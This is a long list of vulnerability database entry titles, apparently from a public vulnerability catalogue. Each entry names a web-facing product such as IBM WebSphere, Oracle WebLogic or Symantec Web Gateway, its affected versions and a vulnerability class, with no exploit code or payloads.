[9919] cPanel WHM 11.34.1.24/11.36.1.14/11.38.1.12/11.39.0.4 Web Host Manager WHM privilege escalation
[9792] IBM WebSphere Commerce up to 7.0.0.7 Request Validation weak authentication
[9791] IBM WebSphere Commerce up to 7.0 Feature Pack 5 REST Session privilege escalation
[9790] IBM WebSphere Application Server up to 8.0.0.4 Property privilege escalation
[9787] IBM WebSphere Application Server up to 8.5.0.1 Cookie information disclosure
[9785] IBM WebSphere Application Server up to 8.5.0.2 File Permission unknown vulnerability
[9784] IBM WebSphere Application Server up to 8.5.0.2 Log unknown vulnerability
[9761] Symantec Web Gateway up to 5.1.0 Input Sanitizer spywall/nameConfig.php privilege escalation
[9760] Symantec Web Gateway up to 5.1.0 SWG Console privilege escalation
[9758] Symantec Web Gateway up to 5.1.0 networkConfig.php privilege escalation
[9757] Symantec Web Gateway up to 5.1.0 Transaction cross site request forgery
[9756] Symantec Web Gateway up to 5.1.0 spywall/edit_alert.php sql injection
[9755] Symantec Web Gateway up to 5.1.0 feedback_report.php sql injection
[9754] Symantec Web Gateway up to 5.1.0 Command etc/sudoers privilege escalation
[9753] Symantec Web Gateway up to 5.1.0 spywall/blocked.php cross site scripting
[9752] Symantec Web Gateway up to 5.1.0 feedback_report.php cross site scripting
[9654] Oracle Secure Global Desktop up to 4.63/4.71 Web UI unknown vulnerability
[9653] Oracle Secure Global Desktop up to 4.63/4.71 Web UI unknown vulnerability
[9621] Oracle Agile PLM Framework 9.3.1 Web Client CS unknown vulnerability
[9608] Oracle WebCenter Content 10.1.3.5.1/11.1.1.6.0/11.1.1.7.0 Web Forms unknown vulnerability
[9607] Oracle WebCenter Content 10.1.3.5.1/11.1.1.6.0/11.1.1.7.0 Site Studio unknown vulnerability
[9606] Oracle HTTP Server 10.1.3.5.0 Web Listener information disclosure
[9605] Oracle HTTP Server 10.1.3.5.0 Web Listener memory corruption
[9604] Oracle HTTP Server Web Listener denial of service
[9603] Oracle HTTP Server Web Listener denial of service
[9602] Oracle HTTP Server Web Listener cross site scripting
[9601] Oracle HTTP Server 10.1.3.5.0 Web Listener cross site scripting
[9600] Oracle HTTP Server 10.1.3.5.0 Web Listener cross site scripting
[9599] Oracle HTTP Server 10.1.3.5.0 Web Listener cross site scripting
[9597] Oracle HTTP Server 10.1.3.5.0 Web Listener memory corruption
[9596] Oracle HTTP Server Web Listener denial of service
[9595] Oracle HTTP Server Web Listener denial of service
[9593] Oracle WebCenter Content 10.1.3.5.1/11.1.1.6.0/11.1.1.7.0 Content Server weak encryption
[9361] cPanel WHM up to 11.38.0.14 Web Host Manager privilege escalation
[9325] IBM WebSphere Application Server up to 7.0.0.27 Transaction administrative cross site request forgery
[9324] IBM WebSphere Application Server up to 8.5.0.2 Oauth cross site scripting
[9323] IBM WebSphere Application Server up to 8.5.0.2 weak encryption
[9321] IBM WebSphere Application Server up to 8.5.0.2 cross site scripting
[9274] Cisco Web Security Appliance 7.1/7.5.7.7 Web Framework privilege escalation
[9243] IBM WebSphere Cast Iron 6.0.0/6.1/6.3 Appliance Offering privilege escalation
[9235] IBM Tivoli Monitoring up to 6.2.3 Web Server privilege escalation
[9231] IBM WebSphere Commerce up to 7.0.0.7 Encryption Algorithm information disclosure
[8925] IBM WebSphere Portal up to 8.0.0.x Web Content Viewer Portlet cross site scripting
[8915] IBM WebSphere Portal up to 8.0 HTTP privilege escalation
[8839] IBM WebSphere DataPower up to 5.0.0 cross site scripting
[8828] SAP NetWeaver Gateway up to 2.0 SP5 SOAP Interface information disclosure
[8813] thttpd 2.25b WebService information disclosure
[8621] IBM WebSphere DataPower XC10 up to 2.1 memory corruption
[8604] IBM WebSphere Application Server up to 8.0.0.5 WS-Security weak authentication
[8558] VMware vCenter Server up to 5.1 Virtual Appliance Management Interface privilege escalation
[8556] VMware vCenter Server Appliance up to 5.1 Virtual Appliance Management Interface privilege escalation
[8523] IBM WebSphere Application Server up to 8.5.0.1 RPC cross site scripting
[8522] IBM WebSphere Application Server up to 8.5.0.1 Input Sanitizer directory traversal
[8521] IBM WebSphere Application Server up to 8.5.0.1 Local OS Registry privilege escalation
[8520] IBM WebSphere Application Server up to 8.5.0.1 cross site scripting
[8518] IBM WebSphere Application Server up to 8.5.0.1 Authentication weak authentication
[8463] Linksys WRT310N 2.0.0.1 Management Interface apply.cgi cross site request forgery
[8461] D-Link DIR865L 1.03 Management Interface cross site request forgery
[8394] Oracle GlassFish Server 3.0.1/3.1.2 REST Interface cross site scripting
[8393] Oracle GlassFish Server 3.0.1/3.1.2 ADMIN Interface cross site scripting
[8376] Oracle 7.0/8.1/8.2 Web Access unknown vulnerability
[8375] Oracle 7.0/8.1/8.2 Web Access unknown vulnerability
[8324] Oracle WebCenter Content 11.1.1.6.0 Content Server unknown vulnerability
[8323] Oracle WebCenter Content 10.1.3.5.1/11.1.1.6.0 Content Server unknown vulnerability
[8322] Oracle WebCenter Sites 7.6.2/11.1.1.6.0/11.1.1.6.1 unknown vulnerability
[8321] Oracle WebCenter Content 10.1.3.5.1/11.1.1.6.0 Content Server unknown vulnerability
[8320] Oracle WebCenter Capture 10.1.3.5.1 Import Server unknown vulnerability
[8318] Oracle WebLogic Server 10.0.2/10.3.5/10.3.6/12.1.1 WebLogic Console unknown vulnerability
[8317] Oracle WebLogic Server 10.0.2/10.3.5/10.3.6/12.1.1 WebLogic Console unknown vulnerability
[8316] Oracle WebCenter Interaction 6.5.1/10.3.3.0 Image Service unknown vulnerability
[8315] Oracle WebCenter Content 10.1.3.5.1/11.1.1.6.0 Content Server unknown vulnerability
[8314] Oracle HTTP Server 11.1.1.6.0 Web Listener privilege escalation
[8313] Oracle HTTP Server Web Listener memory corruption
[8310] Oracle HTTP Server Web Listener information disclosure
[8309] Oracle HTTP Server Web Listener information disclosure
[8308] Oracle HTTP Server Web Listener denial of service
[8307] Oracle HTTP Server 10.1.3.5/11.1.1.5.0/11.1.1.6.0 Web Listener unknown vulnerability
[8306] Oracle HTTP Server Web Listener denial of service
[8305] Oracle HTTP Server Web Listener privilege escalation
[8304] Oracle HTTP Server Web Listener information disclosure
[8300] Oracle HTTP Server Web Listener Numeric Error
[8299] Oracle HTTP Server Web Listener Numeric Error
[8298] Oracle HTTP Server Web Listener denial of service
[8246] Juniper Junos 10.4R12/11.4R6/12.1R4/12.2R2 J-Web Sajax file/jsdm/ajax/port.php privilege escalation
[8226] Cisco IOS XE up to 3.5 Bridge Domain Interface directory traversal
[8136] IBM InfoSphere Information Server up to 8.7 Web Console cross site scripting
[8084] IBM Lotus Domino up to 8.5.3 webadmin.nsf cross site scripting
[8083] IBM Lotus Domino up to 8.5.3 webadmin.nsf cross site request forgery
[8011] Apple Mac OS X 10.8.3 Java Web Start unknown vulnerability
[7854] IBM WebSphere Commerce up to 7.0.0.6 Web Service Framework denial of service
[7725] SonicWALL Scrutinizer 9.5.2 gadget listing fa_web.cgi sql injection
[7704] IBM WebSphere Message Broker up to 8.0 SOAPInput Node WSDL File Requests cross site scripting
[7703] IBM WebSphere Cast Iron Cloud Integration up to 6.3 LDAP Authentication denial of service
[7702] IBM WebSphere Message up to 8.0 WS-Addressing/WS-Security Requests weak authentication
[7701] IBM WebSphere Message up to 8.0 HTTPInput Node memory corruption
[7642] Microsoft Exchange 2007/2010 Outlook Web Access vspdx.dll memory corruption
[7461] IBM WebSphere Application Server up to 6.1.0.45/7.0.0.25 Transaction cross site request forgery
[7460] IBM WebSphere Application Server up to 6.1.0.45/7.0.0.25 cross site scripting
[7459] IBM WebSphere Application Server up to 6.1.0.45/7.0.0.25 Servlet Requests Parser weak encryption
[7458] IBM WebSphere Application Server up to 6.1.0.45/7.0.0.25 cross site scripting
[7457] IBM WebSphere Application Server up to 6.1.0.45/7.0.0.25 cross site scripting
[7395] Oracle Siebel CRM 8.1.1/8.2.2 Highly Interactive Web UI unknown vulnerability
[7354] Oracle Fusion Middleware 9.2.4/10.0.2/10.3.5/10.3.6/12.1.1 WebLogic Server privilege escalation
[7191] IBM Lotus Notes up to 8.5.3 Web Application information disclosure
[7131] Citrix XenApp 6.5.0.0 XML Service Interface memory corruption
[7054] IBM WebSphere 7.1.1 WS ILOG RTS cross site scripting
[7029] Websense Web Security URL Filter Bypass privilege escalation
[7011] IBM WebSphere DataPower XC10 up to 2.1.0.2 weak authentication
[7010] IBM WebSphere DataPower XC10 up to 2.1.0.2 JMX Operations privilege escalation
[6994] IBM WebSphere 7.0.0.1/7.0.0.2/8.0 IBM WebSphere Portal directory traversal
[6962] Mozilla Bugzilla 4.3.2 WebService user.pm information disclosure
[6956] Horde Groupware/Groupware Webmail Edition 4.0.8 Portal Blocks privilege escalation
[6955] IBM WebSphere Application Server 8.5 cross site scripting
[6954] IBM WebSphere Application Server 8.5 JAX-RS privilege escalation
[6953] IBM WebSphere Application Server 6.1/7/8/8.5 Administrative Console cross site request forgery
[6952] IBM WebSphere Application Server 7/8/8.5 Proxy Server denial of service
[6929] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4/4.5 Web Proxy Setting Auto-Discovery privilege escalation
[6916] IBM WebSphere up to 7.1 Message denial of service
[6884] Webmin 1.600 Change Password cross site scripting
[6879] IBM WebSphere DataPower 2.1.x/8.5.x Server-to-Server Communication weak encryption
[6878] IBM WebSphere DataPower 2.1.x/8.5.x Secret Token Transmission weak encryption
[6843] Juniper Junos up to 11.4R3-S3/11.4R4/12.1R2-S1/12.1R3 Web-Authentication Policy Enforcement privilege escalation
[6709] Oracle Fusion Middleware up to 6.3.x/7.0.3/7.6.2/11.1.1.6.0 WebCenter Sites cross site request forgery
[6701] Oracle Fusion Middleware up to 6.3.x/7.0.3/7.6.2/11.1.1.6.0 WebCenter Sites cross site request forgery
[6700] Oracle Fusion Middleware up to 6.3.x/7.0.3/7.6.2/11.1.1.6.0 WebCenter Sites cross site request forgery
[6699] Oracle Fusion Middleware up to 6.3.x/7.0.3/7.6.2/11.1.1.6.0 WebCenter Sites cross site request forgery
[6697] Oracle Fusion Middleware 9.2.4.0/10.0.2.0/10.3.5.0/10.3.6.0/12.1.1.0 WebLogic Server weak authentication
[6678] Cisco WebEx Recording Format Player T27/T28 WRF File memory corruption
[6672] Cisco WebEx Recording Format Player T27/T28 WRF File memory corruption
[6671] Cisco WebEx Recording Format Player T27/T28 WRF File memory corruption
[6670] Cisco WebEx Recording Format Player T27/T28 WRF File memory corruption
[6669] Cisco WebEx Recording Format Player T27/T28 WRF File memory corruption
[6575] IBM WebSphere up to 7.0.0.6 information disclosure
[6567] Cisco IOS up to 12.2/15.2 Tunnel Interface denial of service
[6562] Novell GroupWise 2012/8.0/8.00/8.01/8.02 HTTP interfaces directory traversal
[6561] Novell GroupWise 2012/8.0/8.00/8.01/8.02 WebAccess cross site scripting
[6547] IBM WebSphere Application Server up to 8.5 Multidomain Support privilege escalation
[6546] IBM WebSphere Application Server up to 8.5 Administrative Console weak authentication
[6545] IBM WebSphere Application Server up to 8.5 Application Runtime directory traversal
[6544] IBM WebSphere MQ up to 7.5 Server Message Channel Agent denial of service
[6536] Novell GroupWise 8.0/8.00 WebAccess cross site scripting
[6122] Jamie Cameron Webmin up to 1.590 file/show.cgi open privilege escalation
[6121] Jamie Cameron Webmin up to 1.590 file/edit_html.cgi weak authentication
[6119] Jamie Cameron Webmin up to 1.590 status/edit_mon.cgi privilege escalation
[6118] Jamie Cameron Webmin up to 1.590 status/save_mon.cgi privilege escalation
[6096] Websense Web Security up to 7.6.2 privilege escalation
[6095] Websense Email Security up to 7.3 SMTP information disclosure
[6081] Digium Asterisk up to 1.8.15.0/10.7.0 Manager Interface main/manager.c privilege escalation
[6024] IBM WebSphere 6.1.0.43/7.0.0.23/8.0.0.3/8.5 Global Security Kit (GSKit) weak encryption
[6012] McAfee E-Mail/Web Security 5.5 Patch 6/5.6 Patch 3 Reflected cross site scripting
[6010] McAfee E-Mail/Web Security 5.5 Patch 6/5.6 Patch 3 weak authentication
[5983] IBM Lotus Domino up to 8.5.3 WebMail UI/Domino Help /help/lccon.nsf/ cross site scripting
[5974] IBM WebSphere MQ 7.0.3/7.0.4/7.5 cross site request forgery
[5973] IBM WebSphere MQ 7.0.3/7.0.4 privilege escalation
[5915] IBM WebSphere Application Server up to 8.0.0.4 cross site scripting
[5913] Symantec Web Gateway up to 5.0.3.18 deptUploads_data.php sql injection
[5795] IBM WebSphere MQ up to 7.1 SVRCONN privilege escalation
[5792] Symantec Web Gateway up to 5.0.3.18 spywall/ldap_latest.php sql injection
[5791] Symantec Web Gateway up to 5.0.3 privilege escalation
[5790] Symantec Web Gateway up to 5.0.3 privilege escalation
[5789] Symantec Web Gateway up to 5.0.3.18 spywall/pbcontrol.php privilege escalation
[5788] Symantec Web Gateway up to 5.0.3 spywall/languageTest.php privilege escalation
[5787] Symantec Web Gateway up to 5.0.3 spywall/blocked.php sql injection
[5763] Oracle iPlanet Web Server 6.1/7.0 denial of service
[5746] Oracle Siebel CRM 8.1.1/8.2.2 Web UI unknown vulnerability
[5640] IBM WebSphere 7.0.0.1/7.0.0.2/8.0 directory traversal
[5636] Microsoft Outlook Web App up to 14.1.287.0 owa/redir.aspx weak authentication
[5627] Cisco WebEx Recording Format Player up to 28.0.0 (T28 L10N) memory corruption
[5626] Cisco WebEx Recording Format Player up to 28.0.0 (T28 L10N) memory corruption
[5625] Cisco WebEx Recording Format Player up to 28.0.0 (T28 L10N) memory corruption
[5624] Cisco WebEx Recording Format Player up to 28.0.0 (T28 L10N) memory corruption
[5621] Symantec Web Gateway 5.0.2.8 Perl spywall/adminConfig.php exec privilege escalation
[5618] Horde IMP Webmail Client up to 5.0.21 cross site scripting
[5584] Red Hat JBoss Enterprise 5.1.1 WebPermissionMapping Permissions privilege escalation
[5577] Cisco AnyConnect Secure Mobility Client up to 3.0 VPN Downloader WebLaunch privilege escalation
[5565] IBM WebSphere Application Server up to 8.5 iehs.war privilege escalation
[5476] IBM WebSphere Application Server up to 8.0 Snoop Servlet privilege escalation
[5467] Horde IMP Webmail 4.0.7 Message Page cross site scripting
[5466] Horde IMP Webmail 4.0.7 Minimal Mailbox Page cross site scripting
[5465] Horde IMP Webmail 4.0.7 Tasks View Page cross site scripting
[5464] Horde IMP Webmail 4.0.7 Search View Page cross site scripting
[5463] Horde IMP Webmail 4.0.7 Dynamic Compose Page cross site scripting
[5438] Symantec Web Gateway up to 5.0.2 cross site scripting
[5397] Avsoft Kerio WinRoute Firewall 5 Embedded Web Server information disclosure
[5391] Symantec Web Gateway spywall/timer.php cross site scripting
[5300] Oracle Siebel Clinical up to 8.2.2.x Web UI unknown vulnerability
[5201] Oracle GlassFish Enterprise Server 3.0.1/3.1.1 Web Container denial of service
[5200] Oracle GlassFish Enterprise Server Web Container privilege escalation
[5197] Oracle Fusion Middleware up to 10.3.5 WebLogic Server cross site scripting
[5196] Oracle Fusion Middleware up to 10.3.5 WebLogic Server denial of service
[5195] Oracle Fusion Middleware up to 11.1.1.5 WebCenter Content Reflected cross site scripting
[5194] Oracle Fusion Middleware up to 11.1.1.5 WebCenter Content sql injection
[5193] Oracle Fusion Middleware 7.5.2/10.1.3.5.1 WebCenter Content Reflected cross site scripting
[5192] Oracle Fusion Middleware up to 11.1.1.5 Web Services Manager information disclosure
[5191] Oracle Fusion Middleware up to 11.1.1.5 Web Services Manager unknown vulnerability
[5190] Oracle Fusion Middleware up to 11.1.1.5 Web Services Manager unknown vulnerability
[5177] McAfee Web Gateway 7.0 HTTP Header Host Field Parser privilege escalation
[5174] Oracle Fusion Middleware 10.1.3.5 WebCenter Forms Recognition unknown vulnerability
[5173] Oracle Fusion Middleware 10.1.3.5 WebCenter Forms Recognition memory corruption
[5152] Oracle Siebel Clinical up to 8.2.2.x Web UI unknown vulnerability
[5150] Oracle Siebel Clinical up to 8.2.2.x Web UI unknown vulnerability
[5127] Oracle GlassFish Enterprise Server 3.1.1 Web Container realms.jsf cross site scripting
[5126] Oracle GlassFish Enterprise Server 3.1.1 Web Container cross site scripting
[5090] Oracle iPlanet Web Server 7 Administration Console cross site scripting
[5079] Cisco WebEx Player up to 27.32.0 WRF File memory corruption
[5078] Cisco WebEx Player up to 27.32.0 WRF File atas32.dll memory corruption
[5077] Cisco WebEx Player up to 27.32.0 WRF File atdl2006.dll memory corruption
[5023] IBM Tivoli Directory Server Web Admin Tool cross site scripting
[5012] TYPO3 up to 4.6.6 Command Line Interface information disclosure
[4879] Barracuda Web Application Firewall 600 v7.6.0.028 information disclosure
[4857] McAfee Email/Web Security 5.5/5.6/7.0 Management Console weak authentication
[4856] McAfee Email/Web Security 5.5/5.6/7.0 privilege escalation
[4855] McAfee Email/Web Security 5.5/5.6/7.0 privilege escalation
[4854] McAfee Email/Web Security 5.5/5.6/7.0 Backup Password Encryption weak encryption
[4853] McAfee Email/Web Security 5.5/5.6/7.0 Dashboard information disclosure
[4852] McAfee Email/Web Security 5.5/5.6/7.0 Password Reset privilege escalation
[4851] McAfee Email/Web Security 5.5/5.6/7.0 cross site scripting
[4840] VMware vCenter 4.0/4.1 Web Configuration Tool vCenter information disclosure
[4828] IBM Tivoli Endpoint Manager up to 8.x Web Reports cross site scripting
[4680] VMware Zimbra Web Client zimbra/h/calendar cross site scripting
[4674] IBM WebSphere WS-Security Enabled JAX-WS Applications cross site scripting
[4635] Microsoft SharePoint 2010 themeweb.aspx cross site scripting
[4587] Red Hat JBoss 5.1/5.1.0/5.1.2 Web Surrogate Pair Character memory corruption
[4556] IBM WebSphere Application Server privilege escalation
[4551] IBM WebSphere Application Server up to 7.0.0.20 on z/OS Web Messaging cross site scripting
[4550] IBM WebSphere Application Server up to 7.0.0.20 on z/OS WS-Security Policy cross site scripting
[4529] IBM WebSphere Application Server Tomcat Container denial of service
[4500] phpMyAdmin up to 3.4.8.0 Setup Interface ConfigFile.class.php cross site scripting
[4468] Linux Kernel 2.6.18 OMAP4 Bridge Networking Interface denial of service
[4390] Microsoft Windows Server 2008 Remote Desktop Web Access cross site scripting
[4354] SonicWALL SSL-VPN VirtualOffice up to 4.0 Webfrontend cross site scripting
[4344] Horde IMP Webmail 4.x cross site scripting
[4260] IBM WebSphere up to 7.0.0.0 information disclosure
[4254] IBM WebSphere up to 7.0.1.3 MQ Message memory corruption
[4224] Microsoft Windows 7/Server 2008/Vista Consent User Interface privilege escalation
[4075] IBM Lotus iNotes 8.5.x Web Access cross site scripting
[4000] Microsoft Office 2003/Sp3/Xp Web Components privilege escalation
[3956] Oracle BEA WebLogic 7.x Portal denial of service
[3955] Oracle BEA WebLogic Portal 8.x privilege escalation
[3778] Microsoft Exchange 2003/2007 Outlook Web Access cross site scripting
[3645] Sun Java JRE/JDK Java Web Start 7PK Security Features
[3641] Sun Java JRE/JDK Java Web Start privilege escalation
[3640] Sun Java JRE/JDK Java Web Start privilege escalation
[3639] Sun Java JRE/JDK Java Web Start memory corruption
[3566] IBM AIX 5.2/5.3/6.1 WebSM memory corruption
[3560] IBM WebSphere Application Server 6.0.x/6.1.x serveServletsByClassnameEnabled unknown vulnerability
[3491] Microsoft Web Proxy Auto-Discovery Feature unknown vulnerability
[3490] Citrix Netscaler 8.0 Build 47.8 Web Management cross site scripting
[3474] IBM WebSphere Application Server 6.1.x denial of service
[3473] IBM WebSphere Application Server 6.1.x mod_proxy denial of service
[3465] IBM WebSphere Application Server 6.1.x WebContainer cross site scripting
[3433] IBM Lotus Domino 7.x Web Server cross site scripting
[3414] Apache Tomcat WebDAV Stored directory traversal
[3391] IBM WebSphere Application Server 5.x/6.x unknown vulnerability
[3336] Sun Solaris 8.0/9.0/10.0 Human Interface Device denial of service
[3334] Barracuda Spam Firewall Monitor Web Syslog cross site scripting
[3300] IBM WebSphere Application Server cross site scripting
[3165] SAP Web Application Server Internet Communication Manager denial of service
[3148] IBM WebSphere Application Server 6.1.x Web Container Output information disclosure
[3138] IBM WebSphere Application Server 6.1.x pdtools memory corruption
[3137] IBM WebSphere Application Server 6.1.x Authorization weak authentication
[3136] IBM WebSphere Application Server 6.1.x Messaging denial of service
[3111] Jamie Cameron Webmin 1.280/1.340 pam_login.cgi cross site scripting
[3072] IBM WebSphere Application Server 6.1.0.7 Java Message Service memory corruption
[3023] Sun Solaris 10.0 Java Web Console Format String
[2985] IBM WebSphere Application Server 6.0.x HTTP Response cross site scripting
[2982] IBM WebSphere Application Server 6.1.x JSP File privilege escalation
[2934] MailEnable Web Mail Client unknown vulnerability
[2877] Symantec Web Security up to 3.0.1.85 Error Message cross site scripting
[2860] BEA WebLogic 8.1 JRockit memory corruption
[2859] BEA WebLogic 8.1 Profile unknown vulnerability
[2858] BEA WebLogic 8.1 Sockets denial of service
[2857] BEA WebLogic 8.1 HTTP Request denial of service
[2856] BEA WebLogic 8.1 HTTP Request unknown vulnerability
[2855] BEA WebLogic 8.1 EJB unknown vulnerability
[2854] BEA WebLogic 8.1 EJB unknown vulnerability
[2851] BEA WebLogic 8.1 web.xml denial of service
[2850] BEA WebLogic 8.1 Backup config.xml weak encryption
[2849] BEA WebLogic 8.1 ear File information disclosure
[2848] BEA WebLogic 8.1 WS-Security unknown vulnerability
[2847] BEA WebLogic 8.1 Thread Management denial of service
[2846] BEA WebLogic 8.1 JDBCDataSourceFactory weak encryption
[2845] BEA WebLogic up to 8.1.5 X.509 Client Certificate weak authentication
[2844] BEA WebLogic 8.1 SSL weak encryption
[2812] Sun ONE/iPlanet Web Server 4.x /search cross site scripting
[2783] Novell NetWare 2.0.48/6.5 Welcome Webapp cross site scripting
[2763] IBM WebSphere Application Server up to 6.0.2.17 Servlet information disclosure
[2707] MailEnable 2.32 WebAdmin privilege escalation
[2701] IBM WebSphere Application Server up to 6.1.0.3 on z/OS handleservantnotification Numeric Error
[2700] IBM WebSphere Application Server up to 6.1.0.3 Eal4 Authentication Numeric Error
[2652] SAP Web Application Server up to 7.00 enserver.exe denial of service
[2651] SAP Web Application Server up to 7.00 privilege escalation
[2605] IBM WebSphere Application Server up to 6.1.0.2 WSN Authentication information disclosure
[2604] IBM WebSphere Application Server up to 6.1.0.2 JSP File unknown vulnerability
[2503] Jamie Cameron Webmin/Usermin up to 1.296 cross site scripting
[2502] Jamie Cameron Webmin/Usermin up to 1.296 HTTP GET cross site scripting
[2451] Veritas Backup Exec up to 9.2 RPC Interface memory corruption
[2450] IBM WebSphere Application Server up to 6.1.0.1 Trace privilege escalation
[2449] IBM WebSphere Application Server up to 6.1.0.1 Log File privilege escalation
[2446] IBM WebSphere Application Server up to 6.1.0.1 SOAP privilege escalation
[2428] Novell GroupWise 6.5/7 WebAccess cross site scripting
[2418] VMware ESX Server 2.5.3 Upgrade Patch 2 Management Interface unknown vulnerability
[2417] VMware ESX Server 2.5.3 Upgrade Patch 2 Management Interface unknown vulnerability
[2416] VMware ESX Server 2.5.3 Upgrade Patch 2 Management Interface weak encryption
[2410] Check Point Firewall-1 up to R55W HFA03 Web Server directory traversal
[2375] Cisco Router Web Setup up to 3.3.0 Build 31 Web Frontend privilege escalation
[2350] Jamie Cameron Webmin 1.2.80 weak authentication
[2342] Trend Micro Control Manager up to 3.5 Web-Frontend cross site scripting
[2341] IBM WebSphere Application Server 6.0.2/6.0.2.1/6.0.2.3/6.0.2.5/6.0.2.7 Web Container information disclosure
[2338] Jamie Cameron Webmin 1.2.30/1.2.40/1.2.50/1.2.60/1.2.70 cvename.cgi directory traversal
[2332] IBM WebSphere Application Server up to 6.0.2.10 Configuration Object information disclosure
[2331] IBM WebSphere Application Server up to 6.0.2.10 Datasource Password Encryption unknown vulnerability
[2312] Microsoft Exchange 2000 Outlook Web Access cross site scripting
[2246] BEA WebLogic up to 8.1 SP2 stopWebLogic.sh unknown vulnerability
[2245] BEA WebLogic 8.1 Private Key unknown vulnerability
[2244] BEA WebLogic up to 8.1 SP4 unknown vulnerability
[2243] BEA WebLogic up to 8.1 SP4 JDBC Policy unknown vulnerability
[2242] BEA WebLogic 8.1 Java Web Service unknown vulnerability
[2241] BEA WebLogic up to 9.0 Administration Console unknown vulnerability
[2240] BEA WebLogic up to 8.1 SP4 Administrator Console unknown vulnerability
[2239] BEA WebLogic up to 8.1 SP4 JavaServer Pages unknown vulnerability
[2238] BEA WebLogic up to 8.1 Domain Directory unknown vulnerability
[2237] BEA WebLogic up to 8.1 SP4 Client Connection Manager weak encryption
[2236] BEA WebLogic up to 8.1 SP4 JTA Transaction unknown vulnerability
[2214] IBM WebSphere Application Server 6.0.2/6.0.2.1/6.0.2.3/6.0.2.5/6.0.2.7 unknown vulnerability
[2213] IBM WebSphere Application Server 6.0.2/6.0.2.1/6.0.2.3/6.0.2.5/6.0.2.7 LTPA EJB unknown vulnerability
[2212] IBM WebSphere Application Server 6.0.2/6.0.2.1/6.0.2.3/6.0.2.5/6.0.2.7 Trace unknown vulnerability
[2210] IBM WebSphere Application Server 6.0.2/6.0.2.1/6.0.2.3/6.0.2.5/6.0.2.7 SOAP unknown vulnerability
[2209] IBM WebSphere Application Server 6.0.2/6.0.2.1/6.0.2.3/6.0.2.5/6.0.2.7 User Information addNode.log unknown vulnerability
[2208] IBM WebSphere Application Server 6.0.2/6.0.2.1/6.0.2.3/6.0.2.5/6.0.2.7 HTTP Request unknown vulnerability
[2204] IBM WebSphere Application Server up to 6.0.2.3 Welcome Page weak authentication
[2097] BEA WebLogic up to 8.1 SP5 JSR-168 Portlet Cache information disclosure
[2096] BEA WebLogic up to 6.1 SP7 XML Parser denial of service
[2095] BEA WebLogic up to 6.1 SP7 Internal Servlet information disclosure
[2072] SAP Web Application Server up to 7.00 privilege escalation
[2051] Microsoft Windows Server 2003/XP Web Client Service memory corruption
[2011] BEA WebLogic 6.1/7.0 Domains weak encryption
[2010] BEA WebLogic Portal up to 8.1 SP5 JNDI denial of service
[2009] BEA WebLogic Portal up to 8.1 SP5 SSL Identity denial of service
[2008] BEA WebLogic Portal up to 8.1 SP5 Connection Filter denial of service
[2007] BEA WebLogic Portal up to 8.1 SP5 Security Provider denial of service
[2006] BEA WebLogic Portal up to 8.1 SP5 Password Encryption unknown vulnerability
[2005] BEA WebLogic Portal up to 8.1 SP5 Password Change Log unknown vulnerability
[2004] BEA WebLogic Portal up to 8.1 SP5 Logging information disclosure
[2003] BEA WebLogic Portal up to 8.1 SP5 Java Client MBean RMI weak encryption
[2002] BEA WebLogic Portal up to 8.1 SP5 WSRP unknown vulnerability
[2001] BEA WebLogic Portal up to 8.1 SP5 File Source Stored unknown vulnerability
[2000] BEA WebLogic Portal up to 8.1 SP5 Stored unknown vulnerability
[1973] BEA WebLogic 6.0/6.1/7.0.0.1/8.1 MBeansHome unknown vulnerability
[1962] Microsoft Windows 2000/Server 2003/XP Web Fonts memory corruption
[1937] VMware ESX Server up to 2.5.2 Management Interface cross site scripting
[1925] IBM AIX 5.3/5.3 L WebSM getShell/getCommand privilege escalation
[1888] SAP Web Application Server up to 7.00 frameset.htm cross site scripting
[1887] SAP Web Application Server up to 7.00 Test Application cross site scripting
[1886] SAP Web Application Server up to 7.00 Error Message cross site scripting
[1885] SAP Web Application Server up to 7.00 fameset.htm cross site scripting
[1872] IBM Lotus Domino up to 6.5.4 FP2 Domino Web Access denial of service
[1869] IBM Lotus Domino up to 6.5.4 FP2 Domino Web Access denial of service
[1787] BEA WebLogic 6.1/7.0/8.1 unknown vulnerability
[1783] Sun Java System Directory Server up to 5.2 HTTP Admin Interface memory corruption
[1781] Microsoft Windows XP Wireless Zero Configuration WZCQueryInterface unknown vulnerability
[1755] Jamie Cameron Webmin 1.2.20 PAM Authentication weak authentication
[1705] BEA WebLogic Portal up to 8.1 SP4 URL config.xml privilege escalation
[1687] Microsoft Windows up to XP Telephony Application Programming Interface memory corruption
[1571] Microsoft Exchange 5.5 Outlook Web Access cross site scripting
[1569] Microsoft Windows Server 2003/XP Web Client Service memory corruption
[1563] Sun Java Web Start Sandbox unknown vulnerability
[1542] IBM WebSphere Application Server up to 5.0.2.11 Administration Console Authentication memory corruption
[1518] BEA WebLogic up to 8.1 memory corruption
[1517] BEA WebLogic up to 8.1 SP3 LDAP denial of service
[1516] BEA WebLogic up to 8.1 Input Fields denial of service
[1515] BEA WebLogic up to 8.1 Clustering denial of service
[1514] BEA WebLogic up to 8.1 Control UserLogin weak authentication
[1513] BEA WebLogic up to 8.1 Security Settings unknown vulnerability
[1512] BEA WebLogic up to 8.1 Auditing denial of service
[1511] BEA WebLogic up to 8.1 JDBC Connection Reset weak encryption
[1428] Symantec Web Security up to 3.0.1.74 RAR Archive denial of service
[1425] Oracle Database 9 Web Cache File Blacklist unknown vulnerability
[1423] Oracle Application Server 9 Web Cache webcacheadmin cross site scripting
[1422] Oracle Application Server 10g Web Cache webcacheadmin cross site scripting
[1421] BEA WebLogic 8.1 Administration Server Console cross site scripting
[1412] IBM WebSphere Application Server up to 6.0 HTTP Error Message cross site scripting
[1408] Sun Java System Web Proxy Server up to 3.6 SP 6 memory corruption
[1407] Microsoft Windows 2000 Web View webvw.dll memory corruption
[1369] IBM WebSphere Application Server up to 6.x HTTP Host-Header information disclosure
[1340] IBM Lotus Domino up to 6.0.5/6.5.4 Web Data Fields memory corruption
[1338] IBM Lotus Domino up to 6.5.1 Web Service /cgi-bin denial of service
[1330] SonicWALL SOHO 5.1.7.0 Web Administration Login cross site scripting
[1278] IBM WebSphere Commerce up to 5.6.0.2 unknown vulnerability
[1242] phpMyAdmin 2.6.1 Error Message database_interface.lib.php information disclosure
[1229] BEA WebLogic 7.0/8.1 cross site scripting
[1218] IBM WebSphere Application Server 5.x/6.0 JSP Source Code information disclosure
[1188] Microsoft Exchange 2003 Outlook Web Access owalogon.asp information disclosure
[1121] Squid Proxy up to 2.5.STABLE7 Web Cache Communication Protocol denial of service
[1035] Sun Java System Web/Application Server up to 7 Session-ID unknown vulnerability
